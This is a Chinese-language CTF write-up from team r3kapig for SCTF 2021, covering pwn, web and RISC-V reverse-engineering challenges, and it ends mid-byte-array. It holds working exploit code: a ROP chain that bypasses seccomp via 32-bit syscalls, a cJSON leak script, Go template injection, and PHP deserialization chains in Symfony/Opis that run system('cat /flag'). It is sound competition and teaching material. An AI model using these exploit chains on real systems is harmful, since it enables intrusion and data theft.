# SCTF 2021 writeup by r3kapig

本次SCTF比赛我们获得了第7名,现将师傅们的Writeup整理如下:

![](https://i.imgur.com/tLGTS0Q.png)

也欢迎师傅投简历到root@r3kapig.com,一起来加入这个大家庭

## Pwn:

### Gadget:

沙箱只判断了64位的系统调用,没有判断32位:64位的fstat调用号在32位下对应open,因此可以用32位的open打开flag、用64位的read读入,然后用侧信道逐字节爆破,这里用的是sub。防御上,系统调用过滤规则应先校验调用架构(例如seccomp中的arch字段),拒绝非预期架构的调用。

```python
from pwn import *
#context.log_level = True
context.timeout=8
# if args.Q:
#     p=remote("121.37.135.138", 2102)
# else:
#p = process("./gadget")
'''
0x00000000004011c1 : mov rdi, rbx ; push r14 ; ret
0x000000000040119f : mov eax, dword ptr [rbp - 0xc] ; pop rbp ; ret
0x0000000000401000 : push rax ; pop rax ; ret
0x0000000000401191 : mov rsi, qword ptr [rbp - 0x18] ; mov edx, 0xc0 ; syscall
0x0000000000401162 : mov edi, dword ptr [rbp - 8] ; syscall ; pop rbp ; retn
0x0000000000406adb : xchg dword ptr [rdi], ecx ; ret
0x0000000000403815 : push rcx ; retf
0x0000000000403beb : mov qword ptr [rdi + rdx - 0x27], rax ; mov rax, rdi ; ret
0x000000000040a146 : cmp byte ptr [rax], ch ; jne 0x40a124 ; mov eax, 0xd4b0c388 ; jmp 0x40a124
0x0000000000408266 : cmp byte ptr [rax - 0x46], cl ; push rbp ; ret 0x5069
0x0000000000405831 : jne 0x40583c ; mov rax, rdi ; ret
0x0000000000408853 : jne 0x408852 ; ret
0x0000000000401193 : jne 0x401184 ; mov edx, 0xc0 ; syscall
'''
retf_addr = 0x4011ed
pop_rax = 0x401001
pop_rdi_rbp = 0x401734
pop_rsi_r15_rbp = 0x401732
syscall_addr = 0x401165
int80h_addr = 0x4011F3
bss_addr = 0x40ca00
pop_rsp_r14_r15_rbp = 0x401730
pop_rbx_r14_r15_rbp = 0x403072
pop_rcx = 0x40117b
mov_rsi_r15_mov_rdx_r12_call_r14 = 0x402c04
pop_r12_r14_r15_rbp = 0x40172f
pop_rbp = 0x401102
get_ecx = 0x40119f
cmp_ret = 0x408266
jne_ret = 0x408853
sub_rcx_esi_jne_ret= 0x0000000000403f14
# payload = b"a" * 0x38 + p64(pop_rax) + p64(0) + p64(pop_rdi_rbp) + p64(0) + p64(bss_addr+0x10) + p64(pop_r12_r14_r15_rbp) + p64(0x300) + p64(syscall_addr) + p64(bss_addr) + p64(bss_addr+0x10) + p64(mov_rsi_r15_mov_rdx_r12_call_r14) + p64(pop_rsp_r14_r15_rbp) + p64(bss_addr+0x10)
# p.send(payload)
# offset=0x66+0x41
# rop = b"./flag".ljust(0x10, b"\x00") +
# p64(bss_addr+0x10) * 3 + p64(pop_rbx_r14_r15_rbp) + p64(bss_addr) + p64(bss_addr+0x10) * 3 + p64(pop_rcx) + p64(0) + p64(pop_rax) + p64(5) + p64(retf_addr) + p32(int80h_addr) + p32(0x23) + p32(retf_addr) + p32(pop_rdi_rbp) + p32(0x33) + p64(3) + p64(bss_addr+0x10) + p64(pop_rsi_r15_rbp) + p64(bss_addr+offset) * 3 + p64(pop_rax) + p64(0) + p64(syscall_addr) + p64(jne_ret) + p64(pop_rcx) + p64(bss_addr+offset) +p64(pop_rbx_r14_r15_rbp) +p64(bss_addr+offset-0x41)*4+ p64(sub_rcx_esi_jne_ret) +p64(0)*3+p64(0x0000000000401077) +p64(0x405837)
# p.send(rop)
flag=""
loop=0x405837
def exp(p,num,kum):
    payload = b"a" * 0x38 + p64(pop_rax) + p64(0) + p64(pop_rdi_rbp) + p64(0) + p64(bss_addr+0x10) + p64(pop_r12_r14_r15_rbp) + p64(0x300) + p64(syscall_addr) + p64(bss_addr) + p64(bss_addr+0x10) + p64(mov_rsi_r15_mov_rdx_r12_call_r14) + p64(pop_rsp_r14_r15_rbp) + p64(bss_addr+0x10)
    p.sendline(payload)
    offset=num+0x41
    rop = b"./flag".ljust(0x10, b"\x00") + p64(bss_addr+0x10) * 3 + p64(pop_rbx_r14_r15_rbp) + p64(bss_addr) + p64(bss_addr+0x10) * 3 + p64(pop_rcx) + p64(0) + p64(pop_rax) + p64(5) + p64(retf_addr) + p32(int80h_addr) + p32(0x23) + p32(retf_addr) + p32(pop_rdi_rbp) + p32(0x33) + p64(3) + p64(bss_addr+0x10) + p64(pop_rsi_r15_rbp) + p64(bss_addr+offset-kum) * 3 + p64(pop_rax) + p64(0) + p64(syscall_addr) + p64(jne_ret) + p64(pop_rcx) + p64(bss_addr+offset) +p64(pop_rbx_r14_r15_rbp) +p64(bss_addr+offset-0x41)*4+ p64(sub_rcx_esi_jne_ret) +p64(0)*3+p64(pop_rax)+p64(0x405614)+p64(0x0000000000401077) +p64(loop)
    #p64(pop_rax) + p64(0) + p64(pop_rdi_rbp) + p64(0) + p64(bss_addr+0x10) + p64(pop_r12_r14_r15_rbp) + p64(0x300) + p64(syscall_addr)+p64(bss_addr) + p64(bss_addr+0x10) + p64(mov_rsi_r15_mov_rdx_r12_call_r14)
    #gdb.attach(p, "b* 0x0000000000403f14")
    #sleep(1)
    p.sendline(rop)
    print(p.recv())
if __name__=="__main__":
    for i in range(5,128):
        print(i)
        for j in range(0x31,127):
            p=remote("121.37.135.138", 2102)
            try:
                exp(p,j,i)
                flag=flag+chr(j)
                print("flag:"+flag)
                p.close()
                continue
            except:
                p.close()
                continue
#SCTF{woww0w_y0u_1s_g4dget_m45ter}
```

### Dataleak:

json解析时存在漏洞,通过注释符“/*”可以跳过两个字节的null,题目中变量大小为0x10,可输入0xe字节数据。

![](https://i.imgur.com/dnOjYL8.png)

可以看到,识别到“/*”之后,程序将“*/”和空字符同等看待,都使读指针后移2字节,而写指针不变,进而跳过2字节的空字符,使本不应被解析的数据被带出。修复思路是在注释内遇到空字符时立即停止,而不是继续后移读指针。

```python
from pwn import *
context.log_level = True
#p = process("./cJSON_PWN")
p = remote("124.70.202.226",2101)
#gdb.attach(p, "b* $rebase(0x120d)\nb* cJSON_Minify+187")
payload1 = b"/*1234*/5678/*"
payload2 = b"*" * 0xc + b'/*'
p.send(payload1)
p.send(payload2)
key = p.recv(0xb)
payload1 = b"/*12345678*//*"
payload2 = b"/*123*/*****/*"
p.send(payload1)
p.send(payload2)
key += p.recv(0xb)
log.info(key)
p.recvuntil("input your leaked data:")
p.sendline(key)
p.interactive()
#SCTF{cJSON_1eakdata_Never_trust_4n_escape_character}
```

## Web:

### Loginme

X-Real-IP bypass

Golang template injection: {{.Password}}

![](https://i.imgur.com/1G1Vzrn.png)

### Upload_it

```php
<?php
namespace Symfony\Component\String {
    class AbstractUnicodeString {
    }
    class UnicodeString extends AbstractUnicodeString {
        public $string;
        function __construct() {
            $this->string = new \Symfony\Component\String\LazyString;
        }
    }
}
namespace Symfony\Component\String {
    use Opis\Closure\SerializableClosure;
    class LazyString {
        public $value;
        public function __construct() {
            // $this->value = [new SerializableClosure,'id'];
            $function = function(){
                eval(system('cat /flag'));
            };
            $this->value = new \Opis\Closure\SerializableClosure($function);
        }
    }
}
namespace {
    include_once "../vendor/opis/closure/autoload.php";
    $poc = new Symfony\Component\String\UnicodeString();
    file_put_contents("sess_62ad0d85b6ce7ab3bc6a40c2937e4c63" , "r3kapig|".serialize($poc));
}
```

![](https://i.imgur.com/vowUEk5.png)

![](https://i.imgur.com/Z6Jqchr.png)

### upload it 2

```php
<?php
namespace Symfony\Component\String{
    class UnicodeString{
        public $string;
        public function __construct() {
            $this->string = new LazyString();
        }
    }
}
namespace Symfony\Component\String{
    class LazyString{
        public $value;
        public function __construct() {
            $this->value = [new \sandbox(), "backdoor"];
        }
    }
}
namespace {
    use Symfony\Component\String\UnicodeString;
    class sandbox{
        public $evil;
        public function __construct() {
            $this->evil = "/flag";
        }
    }
    echo serialize(new UnicodeString());
}
```

payload:

```
r3kapig|O:38:"Symfony\Component\String\UnicodeString":1:{s:6:"string";O:35:"Symfony\Component\String\LazyString":1:{s:5:"value";a:2:{i:0;O:7:"sandbox":1:{s:4:"evil";s:5:"/flag";}i:1;s:8:"backdoor";}}}
```

![](https://i.imgur.com/NyrxEJc.png)

## Reverse:

### SycOS:

文件kernel是题目系统内核文件,sctf是题目文件

指令集是risc-v 64,用Ghidra可以反编译,IDA7.6能打开但是只能看汇编

先把题目的文件跑起来

编译安装qemu-system-risc-v

```
sudo apt install libpixman-1-dev
git clone https://github.com/qemu/qemu
cd qemu/
git checkout v5.0.0
./configure --target-list=riscv64-softmmu
make -j 8
sudo make install
```

运行`./run.sh`即可运行题目的系统

系统内运行`./sctf`即可运行题目

题目输出了三行提示

```
1.2A 24B 7C60 173C
2.Fake Tea
3.Based on xv6 2020 labs & util branch.
```

第三行提示说明这是一个基于xv6 2020 labs的项目

分析算法

程序运行流程是接收输入再进行两轮加密

![](https://i.imgur.com/FHmwHxj.png)

第一轮加密是用sbrk申请两段0x1000(刚好为一个页)的内存buf1和buf2,将输入的0x40个字节通过一个算法扩展到buf1和buf2

![](https://i.imgur.com/uXlOSyj.png)

0地址处的算法

![](https://i.imgur.com/qLQ64Of.png)

第二轮加密流程

整体流程: 依次加密16次

![](https://i.imgur.com/bfC7PFD.png)

魔改版tea算法,循环16次,用来加密buf2

![](https://i.imgur.com/IjRKHqS.png)

逆运算:

```cpp
void re_tea_buf2(unsigned int *data) {
    unsigned int sum = 0;
    unsigned int v0 = data[0];
    unsigned int v1 = data[1];
    unsigned int k0 = 0x11222233;
    unsigned int k1 = 0xAABBCCDD;
    unsigned int k2 = 0x1A2B3C4D;
    unsigned int k3 = 0xCC1122AA;
    unsigned int sums[16];
    unsigned int sums_idx = 0;
    do {
        sum -= 0x61c88647;
        sums[sums_idx++] = sum;
    } while (sum != -0x1c886470);
    for (int i = 15; i >= 0; i--) {
        sum = sums[i];
        //v1 -= ((v0 << 4) + k2) ^ (v0 + sum) ^ ((v0 >> 5) + k3);
        //v0 -= ((v1 << 4) + k0) ^ (v1 + sum) ^ ((v1 >> 5) + k1);
        v1 -= ((v0 << 4) + k2) ^ (v0 + sum) ^ ((v0 >> 5) + k3);
        v0 -= ((v1 << 4) + k0) ^ (v1 + sum) ^ ((v1 >> 5) + k1);
    }
    data[0] = v0;
    data[1] = v1;
}
void re_buf2() {
    for (int i = 0; i < 0x200; i++) {
        re_tea_buf2((unsigned int*)(dst2 + i * 8));
    }
}
```

又是个魔改的tea算法,循环8次,用来加密buf1

![](https://i.imgur.com/YXjFtsm.png)

逆运算:

```cpp
void re_tea_buf1(unsigned int* data) {
    unsigned int v0 = data[0];
    unsigned int v1 = data[1];
    unsigned int k0 = 0x11222233;
    unsigned int k1 = 0xAABBCCDD;
    unsigned int k2 = 0x1A2B3C4D;
    unsigned int k3 = 0xCC1122AA;
    unsigned int sumlist[8] = { 0 };
    int idx = 0;
    unsigned int sum = 0;
    do {
        sumlist[idx] = sum;
        sum = sum + -0x61c88647;
        idx++;
    } while (sum != -0xe443238);
    for (int i = 7; i >= 0; i--) {
        sum = sumlist[i];
        v0 += (v1 + sum ^ v1 * 0x10 + k0 ^ (v1 >> 5) + k1);
        v1 += (v0 * 0x10 + k2 ^ (v0 >> 5) + k3 ^ v0 + sum);
    }
    data[0] = v0;
    data[1] = v1;
}
void re_buf1() {
    for (int i = 0; i < 0x200; i++) {
        re_tea_buf1((unsigned int*)(dst1 + i * 8));
    }
}
```

buf1的内容交换到buf2里面

![](https://i.imgur.com/0OB1fYA.png)

逆运算:

```cpp
void swap_data(int i){
    unsigned char tmp[0x100];
    int rev_i = 15 - i;
    memcpy(tmp, dst1 + rev_i * 0x100, 0x100);
    memcpy(dst1 + rev_i * 0x100, dst2 + i * 0x100, 0x100);
    memcpy(dst2 + i * 0x100, tmp, 0x100);
}
```

调用22号syscall函数

![](https://i.imgur.com/YJ1JGsT.png)

由于题目给的kernel文件是没有符号的,先编译一份带符号的kernel文件来定位syscall_table的位置

编译kernel

按照这个网站的说明下载编译题目系统的内核源码

[Lab: Xv6 and Unix utilities](https://pdos.csail.mit.edu/6.828/2020/labs/util.html)

首先编译安装risc-v tool chain

```
sudo apt-get install libncurses5-dev
sudo apt install autoconf automake autotools-dev curl libmpc-dev libmpfr-dev libgmp-dev \
    gawk build-essential bison flex texinfo gperf libtool patchutils bc \
    zlib1g-dev libexpat-dev git \
    libglib2.0-dev libfdt-dev libpixman-1-dev \
    libncurses5-dev libncursesw5-dev
git clone https://gitee.com/mirrors/riscv-gnu-toolchain
cd riscv-gnu-toolchain
git rm qemu
git submodule update --init --recursive
./configure --prefix=/opt/riscv64
sudo make newlib -j 8
sudo make linux -j 8
```

编译xv6-labs-2020项目

```
git clone git://g.csail.mit.edu/xv6-labs-2020
cd xv6-labs-2020
git checkout util
make TOOLPREFIX=/opt/riscv64/bin/riscv64-unknown-elf- qemu ``` 逆向syscall 拿出 `xv6-labs-2020/kernel/kernel`文件,这是带符号的内核ELF,用IDA7.6打开,定位到函数 `syscall`,往下翻找到syscalls符号 ![](https://i.imgur.com/fKpQYxB.png) 里面存放的是syscall函数的地址 ![](https://i.imgur.com/nEdb05d.png) 往下翻发现特征字符串 ![](https://i.imgur.com/6hc4cVg.png) 通过这个字符串在题目kernel里面定位到syscall函数,再定位到syscalls符号 ![](https://i.imgur.com/GGQ2lQy.png) 题目kernel中的syscalls多了个0x80006184,从上往下数它就是第22个syscall函数了 根据源码中的sys_sbrk函数得知这个指令集的syscall函数需要调用函数来拿参数 ![](https://i.imgur.com/PN3FqPA.png) 通过逆向得知这个syscall的作用是交换两个输入地址的pte ![](https://i.imgur.com/JSuWImj.png) 那逻辑就和交换数据一样 逆运算: ```cpp void swap_dst() { unsigned char tmp[0x1000]; memcpy(tmp, dst1, 0x1000); memcpy(dst1, dst2, 0x1000); memcpy(dst2, tmp, 0x1000); } ``` 整个求逆脚本: ```cpp #include <iostream> #include "windows.h" unsigned char dst1[] = "\x58\xC0\x98\x44\x55\x04\x41\x2C\x7E\x4B\x49\x50\xE1\x97\x57\x16\x3D\xC7\x6F\xDB\xEA\x4F\xCE\xEA\x2A\xDC\x2D\x39\x8F\x39\x92\x98\xA3\x78\x90\x69\x17\x65\x16\x8B\x4E\xC7\xB2\x12\x45\xE4\x15\xA6\x6C\xCC\x36\xDD\xE2\xFC\x47\x51\xF3\x8F\xC4\xBF\x07\x16\xD5\x17\xC9\x72\x8D\x42\xA4\x23\x18\xB1\x3A\x94\x03\x09\x75\xFD\x04\xF4\xD4\x39\x1D\xA6\xAD\xA4\x69\xDD\xC2\x38\xCF\x06\x56\xB6\x98\xB6\xE3\x67\x5C\x18\x88\x98\xC8\xCA\x46\x16\x57\x33\xDD\x5B\xA8\xFE\x23\x7A\x7C\x85\x67\xD1\x53\x53\xF2\x53\xD4\x7D\x97\x93\xB7\x7F\x49\x47\xB9\xE7\x5A\x5B\x4A\xCD\x19\xB9\xB3\x53\xD5\xF6\xD7\xB0\x47\xCD\xBA\x5A\x7E\x9D\x27\x72\x9D\x78\xD3\x1D\xB0\xA7\x28\x45\xD9\x6D\xE0\xEA\xC6\x66\x9A\x07\x9A\xB7\x09\x18\xBD\x3E\xD0\x35\x64\xA4\xC2\x26\x9D\x34\xFE\x85\x4C\x01\xA6\xF3\x02\x4A\xD5\x6C\x83\xD1\xC7\x4E\xE8\xC5\xC2\x27\xAD\x70\x0F\x26\x7F\xB9\x9B\xCB\x76\xA9\x7E\xCA\x64\x5C\x31\x56\xB7\xFE\xB8\xCE\xAC\xB0\x3F\xCA\x4B\x9A\x8E\x85\x4E\x36\x87\x5A\x74\xE5\x7D\x73\x1F\xD1\xFD\x26\xC0\xB2\xE6\xB1\xFA\x06\x95\x4E\xC9\xEC\x50\xFE\x1A\x13\xE4\x6F\x69\x48\xA4\xCD\xED\xAB\xAD\xEA\x2E\x05\x92\x7C\xBE\xBE\xB0\xE7\xBE\x7F\x53\xA4\x1D\xEF\x4A\x4F\xC1\xFE\x86\xD9\x20\x4A\x28\x2D\xE5\x15\x80\x43\x3E
\x8F\x03\x2F\xB5\x75\x1D\x7E\x78\x92\x12\x2E\xAB\x47\x6A\xA0\xF7\x0C\x49\x85\xFD\x0A\x6B\x7D\x85\x4E\x5B\xD4\x07\xCC\x3C\xCF\x7D\x6C\xEF\xF7\xDE\x78\x54\x41\x0C\x9E\x56\xC4\x7B\xD7\x9D\xC1\xFF\x4D\x28\x78\x96\xC0\x78\x48\xF7\xA4\xFE\xEE\x96\xEE\x16\xAB\x31\x85\xE4\x4F\xBA\xB8\xFE\x8B\xF5\x99\xA4\xB5\xE2\x8F\xE5\xF8\x9B\xC2\xBA\x75\xC0\x39\x04\xD1\x0D\xCC\x69\x2F\x4D\xB1\x2A\x3F\x1E\x09\xE6\x1E\xF7\x63\xDF\x1C\xBB\xD4\x23\x17\xF0\x3D\xED\xA5\xCD\x74\x5F\x10\xDE\x94\xA2\x9E\x3D\x99\xA6\xBB\x08\xCD\x59\x7A\x2A\x67\xBE\xB5\xA8\x1C\x2C\x18\xDA\xD9\x29\x22\x83\xCD\x77\xBD\xAC\xF1\x65\x87\x45\xBF\x75\x95\xE6\x61\xCF\x47\xB4\xBE\x94\x62\x6C\x87\x7B\xC3\x9A\x55\x54\x44\xD8\xFE\x28\xB9\x05\xB3\xED\xF6\x14\x54\xEC\x26\x1E\xB2\xAC\xE3\x44\x41\x87\xC0\x2E\x7A\xAA\x5E\x3A\xB3\xA9\x43\xA7\x31\x1F\x2B\x03\x36\x91\x87\x49\x93\x6F\x1F\xB6\x84\x2E\x33\xB9\x82\x65\x75\xC9\x5B\x40\x65\x6F\x52\x48\x5B\xBC\x2A\xB5\xEC\x98\x37\xEA\x9C\x79\x70\x4A\xBF\x49\x36\xB2\x45\xCD\x38\xD0\xFE\xCE\x99\xAC\xBD\x33\x1D\x1E\x02\xAD\xB2\xD3\xA6\x81\xED\x07\x35\xB5\xD8\x04\x42\x39\xB4\xFC\xF4\x85\xE0\x66\x53\x4F\x2F\x0B\x17\x58\x14\xED\x6A\xA5\xB5\x0E\x13\x6C\x35\x98\x8D\x25\x48\x60\x7C\xD3\xEB\x94\x2A\x5C\xAD\x49\x86\x92\xD7\xA0\xD0\xF3\x8C\x75\x9F\xD3\xC6\x74\xDE\x54\x4C\x71\xE3\x40\x0C\x4E\xFC\x0A\xB8\xD9\x12\x29\x0B\xDC\x74\x62\x44\x89\xE8\x99\x29\x66\x62\x77\xD6\x2D\xBE\xCF\x25\xF8\xF2\x4A\x2D\x73\x94\xA6\x3A\xA5\xF2\x05\x43\x86\x04\x98\x4B\x48\x2D\x80\xF7\x84\x6B\x6F\xC9\x1C\x93\x46\x01\x83\xBE\x68\x61\xB8\xCF\xA4\x2B\xA6\xF3\xBC\x7B\xA8\x29\x9F\x47\xA5\xF7\xD6\x3E\x6C\x37\x06\x88\xEC\xD1\x74\xC9\xA1\x1E\xD1\x99\x77\xB7\x95\x86\x52\xF2\xFC\x88\x24\x49\x51\x9D\xC1\x24\xB9\x96\x70\x3B\x9C\xAD\xEB\xAE\x62\xAE\x13\x55\x23\xB8\x75\x2B\x58\xDB\xE7\x24\xF5\xFF\x57\xBA\x5F\x45\xE5\xF9\xCF\xD0\x5F\xC2\x12\x60\x6A\x5D\xC8\x23\x20\x5E\x38\x0B\x05\xFA\x9C\x7D\xA8\x8C\x15\xC2\xC4\x2F\xDD\xED\x22\x97\x88\x43\xEE\xCE\xFC\x69\x15\x2D\xFE\x75\xD3\x9A\x6F\x60\xE8\x4B\x20\xEB\x53\x7D\x41\x31\x7B\xF8\x5B\x6C\xC8\x82\xFD
\xC4\x9E\xB2\xAC\xAE\x00\xF1\xB7\x40\x7D\xBD\xFE\xA3\xB2\x16\x51\xAE\xA5\x50\x6B\xB4\x1D\xB8\x41\xFC\x27\x8D\xD5\x73\xA5\x86\xA5\x43\x3F\x4F\x35\xCE\x54\xE0\xA2\xCD\xA1\x93\x8A\xA4\xC6\x2F\xD9\xF9\x2D\xA2\xA2\x7A\x41\x90\x41\xD3\xD6\xF3\x0C\x52\x40\x39\x5B\x79\xA3\xA1\xA6\xF8\xF1\xA7\xF0\x04\x47\x6B\x22\x9E\x47\x78\x63\x84\x42\xC5\x7D\x9F\xE1\xE2\x32\x93\x9F\xFA\x2C\x61\xBE\x7B\xFE\x83\xB5\xBF\x9B\xEC\x52\xAE\x03\xBD\xA0\x13\x77\xBE\x8C\x4A\x4C\xE1\x1B\x0C\x9E\x76\x9E\x4B\x95\x74\x82\xC2\x7E\x09\xA2\x23\xA4\x94\x12\x92\x3E\xFD\x98\xDC\xF2\x6F\x27\xE7\xC8\xCB\x55\x67\x6F\x9D\x44\x5F\x03\x89\x05\x3F\x70\xF1\x9C\xD9\x0C\x3F\x91\xF6\x98\x20\xAD\x96\x6D\x18\xFA\xE1\x58\x0D\x6C\x55\x9A\xF9\x14\x14\x60\x2C\x8B\x72\xD2\x8A\x57\x95\x02\x01\x8D\x4C\x9F\x86\x08\xE6\x4A\xE9\xF1\x93\xFF\xAF\xC8\xD0\x64\xA9\x2B\xD9\xBB\xFB\x71\x16\x5B\x62\x12\x8D\x7D\xC2\x6C\x85\x39\xA9\xDE\xD8\xF9\x87\x4A\xB9\xF1\x6A\xDF\xC0\x0D\x39\x96\x00\x8C\x12\xFD\x1F\xE0\xFE\xFE\x2A\xB1\x6B\x02\x0F\xAF\x11\x38\x36\x04\xBE\x43\xEE\xD5\xFB\xB9\x17\x3A\x5E\xEF\x22\x0F\x5B\x7E\xB0\x5E\x17\x69\x3C\xE1\x63\x2E\x20\x61\x54\x61\x4C\x24\x9F\x9D\x5D\xE3\x35\x1D\x66\x41\xE1\x8C\xEF\xD4\xFD\x3E\x6C\xA3\x1D\xF9\x5A\x52\x72\x4B\x89\x7D\x1F\xC6\xFB\x66\xFD\x26\x46\x64\x37\x6F\xCE\x23\x0A\x21\x18\xDA\x38\x9C\x99\x58\x8D\xB3\x23\x1D\xB4\x00\x74\x9A\x24\x83\x94\xE9\x75\x3C\xC0\x38\x83\xBB\x97\x42\xA1\x98\x71\xE9\x6E\xE0\x70\xC0\xB1\x55\xDE\xBC\x17\xCA\x78\x5A\x4C\x94\xBB\x52\x6A\xC1\x6B\x8C\xD4\xA6\x87\x52\xA8\x05\xC7\xCB\x83\x97\x30\x5D\xAF\xC6\x50\xA8\x2A\xEE\xFB\xB5\x5B\xA7\x5E\xEF\x1E\x34\xCF\x8C\x62\x30\xFD\xB2\x3F\x44\x0B\xFF\x42\xAA\x6E\x47\x60\x9C\x9F\xF3\x08\x27\x02\xF3\x29\x53\x83\x7B\x1C\x3E\xB4\x95\x4B\x70\xE4\x99\x3B\xFE\x3E\xF0\x89\x7A\xD2\xB1\xAA\x64\x3D\xF7\xB2\xCE\x4F\x91\x1B\xAE\x6D\xC8\x7D\xD5\x64\xED\xAE\x6F\xD5\x23\x7D\x2A\x7A\x26\xB5\x73\x05\x6E\x9A\x26\x7F\x45\xE2\xA8\xAE\x1F\x1F\x6D\x9D\x40\xFD\x2E\x81\x59\xA7\x80\x69\xA7\x49\xCA\x9C\x1F\x32\x2E\x48\x15\x69\x69\x5A\x54\x4E\xF0\xD7\xB7\xFF\xB9\x5B\x69
\x47\xF0\xD3\xDE\x1D\xF3\x4E\x45\x23\x24\xD2\x93\x29\x83\x56\x61\x4F\x88\x46\xF0\x7A\xB6\x2D\xE5\x1D\x4B\x73\xEF\xE5\x1A\xB3\x96\xD9\xAC\xAC\xC1\xDF\x64\x1E\x06\x4F\x66\x48\x81\x68\xE5\xF3\xE0\x6B\xB7\xCB\x9A\x59\xCC\x70\xEB\xCC\x07\x1D\xA9\x23\xCF\x1A\x5D\x71\x57\x0C\x67\xF4\xE0\xA5\x26\x30\x04\x7A\x0A\xE8\xF9\x52\x3E\x6B\x04\x8C\x11\xB7\x28\x56\xE6\xF9\xC5\x5B\xFE\x86\xD8\x35\xC7\x16\x70\xBC\x32\xEA\xA5\xBE\x0C\x59\x9B\x9C\x57\x7B\xDE\x3D\x6E\x65\xD2\xE3\xAA\x29\xFA\x57\xFB\xB7\x94\x50\xD3\x92\xB2\x41\x9E\xD2\x6A\xBB\x7A\x28\xAC\xD5\x6F\xF8\x0B\x8A\xEC\x4E\x15\x30\x53\x39\xB4\x64\xEC\x30\x64\x4D\x39\x89\xE3\x38\xB1\x3F\x8C\xFA\x34\x4B\xCC\xCB\xE8\xEF\x0F\xAF\x32\x03\x9F\x41\x22\x2D\x05\xBD\x4F\xDB\xAB\x3B\x98\x86\x47\xA7\xE9\x12\x45\x87\xED\x63\x86\xF2\x74\x08\xD8\x20\x10\x99\x57\x93\x71\xBA\xF2\x65\x5F\x88\x29\xBE\x4C\x0F\xCD\x1B\x10\xB0\x3F\x4A\xED\x69\x0C\x8C\x43\x81\xDB\x20\x6F\x29\x65\x8C\x34\xA2\xBE\xB4\x96\x75\xD7\xC8\xAA\x89\x40\x38\xBB\xB8\xEE\x41\x1A\x2B\xC6\xC5\xD0\x99\x41\x73\x82\x1F\xFB\x41\x52\xF4\x84\x1C\x31\x3D\x9B\x5A\xFB\xB6\x95\x07\x67\x32\x9F\x95\x12\xC6\x86\x20\x1B\x6C\x5D\x3D\x18\xCF\x99\xB5\x7C\x45\x60\x59\xBB\xFD\x20\xD3\x82\xA6\x92\x56\x06\x56\x64\x51\x87\x92\x46\x7B\x6C\xB0\x79\x12\xA1\x3E\x69\x8F\x2F\xA4\xCE\x24\x4F\x89\x11\x11\xA3\x50\x80\xA3\xF0\xCB\xAA\xB5\x59\x04\x77\x52\xF5\x3A\x18\xB0\x05\x24\x67\xE6\xBB\xD3\x62\xC4\xBB\x5C\x60\x5E\xD9\xFE\xFA\x66\x35\x02\x9B\x55\xA2\x27\xE2\xCB\x0B\xB8\x43\x2D\xB0\xD1\x11\x42\x10\x07\x67\x7D\x6B\x11\xC3\xE2\x37\xFF\x0A\x64\xF9\x2A\x61\xE2\xD6\x38\x5A\x91\xC3\x18\x75\xE9\xE8\xDA\x4C\xEA\x1A\x3B\xDB\x04\xC9\x50\x45\xBD\x1C\xE6\x0F\x01\xFA\x3E\xFC\x85\x52\x88\x3F\xFC\x56\x78\xF8\x35\xBC\x72\x09\x1F\x58\xFF\x86\xEE\x4E\xB7\x9C\xC8\xC0\x69\x18\xEF\x62\xBF\xF7\x19\x69\xF8\x11\x62\xDD\xC5\x59\xBA\xF2\x37\x6A\x25\x21\x96\x4E\x4B\xDC\xBA\x2C\xFD\x6E\x1C\x55\x9E\x0A\x34\x68\xE6\x2B\x10\x1C\x2D\x9E\x39\xF4\x6B\x44\x60\x9B\x2D\xA0\xC9\x19\x9C\x7A\x28\x19\x2A\xDD\x58\x49\xD6\x52\xF8\x83\x3A\x36\xEA\xEF\x35\xA2
\xEB\xDB\xB5\x1C\x86\xC8\x34\xBC\xA4\x57\xE9\x75\x0A\x8D\x2F\x9F\x53\x90\xC1\x6F\xB1\x97\x83\x8A\x28\x5A\x1F\x71\x59\x46\x2F\xCA\x29\x23\xA3\x5F\x26\x46\x63\x07\xFE\x70\x9A\x54\xA2\x9E\x36\xAC\xEA\xFD\xAA\xAE\xB9\x9E\xC4\xD3\xAF\x99\x20\x85\x00\xA3\x11\xAA\x25\x02\x8C\x76\xAF\x82\x88\xEA\x00\x10\x9A\x48\x73\xCC\xB9\xBE\x73\xB9\xF2\x6D\x72\xE5\x85\x80\xBE\x8B\x28\x57\x76\x30\x34\x48\x30\x0E\x94\x7F\x8E\x06\x37\x00\xB4\x5F\xD9\xA7\xCA\x31\x8D\xE2\x42\xA6\x9C\x05\x8B\xB8\x10\x2A\xBC\x22\xA0\x1A\x56\x76\xA2\xAD\xB7\x3F\x3B\xEA\xB8\x50\xE7\x95\xF5\x15\x76\xC0\x35\x48\x0B\xF3\xED\xE4\x45\x4A\x2C\x88\x3A\x02\x4E\xDE\x53\x43\x42\xCD\x6D\x4C\xFE\x65\xDD\xDA\x13\x84\x57\xF6\xD1\xCD\x86\xDF\x96\xE2\xE1\xAB\xC1\x8E\xA0\x7B\x5C\x4E\xA9\xEE\x2C\x47\x1F\xC4\x02\x0A\xA4\xA4\x9D\xFA\x56\xCE\x0A\x9A\xCE\xB8\xD9\xFC\x32\x0A\x9C\x6E\xE6\xF8\x42\x14\x32\x90\xAC\xA6\x39\x4E\x05\xA3\xF7\xFB\x63\x16\x8B\x42\xCD\x5A\x8B\x92\xC2\xA4\x14\x21\x3C\x6C\xA2\xAE\xBF\x4C\xA8\x36\x4B\x14\xFC\x93\x3B\x3D\xAF\x95\xE4\x50\xD4\x76\xDA\x9A\xC0\xF3\xED\x80\x6C\x6A\xF0\x68\xFC\x1E\x4D\x9C\x4B\xDD\x1C\x1E\x55\x0A\xBC\x8C\xDA\xAF\x34\x5C\xB0\x3F\x78\xCC\x19\x0C\x4E\x41\xBE\x1B\x27\x33\xC2\xA5\xC4\xF6\x85\xF3\x55\x7B\xD2\xDB\xBC\xE2\x18\xB1\x06\x43\xC4\x63\x37\x30\x2A\x98\xFF\x4F\x85\xA8\x21\xA6\xA4\xA1\xDE\x56\xF4\x25\xBB\xAF\xEE\x6C\x0C\x56\x10\x4B\xD7\x72\x5C\xCA\x03\x42\x3B\xE7\xE4\x39\x82\xFF\x6D\x5A\xD0\x97\x8C\x99\x82\x32\x72\x2C\x7D\x19\x5D\xAF\x0C\x1C\xC5\x0B\xCB\xBB\x9C\x18\x91\xB7\x46\x5A\xCE\x73\xEC\xC4\x4A\xE4\x1F\xBE\x51\xA2\x45\xE2\x82\x09\x0B\x9E\x69\x1F\x2F\xED\x97\x90\xEA\x0F\x05\x37\xC9\x60\x64\x03\x6F\x62\xD7\xED\x49\xD7\xD9\x04\x84\x55\x02\x86\x62\x21\x61\xD2\xB4\x3B\xAF\x4C\x28\x69\xE3\xD8\x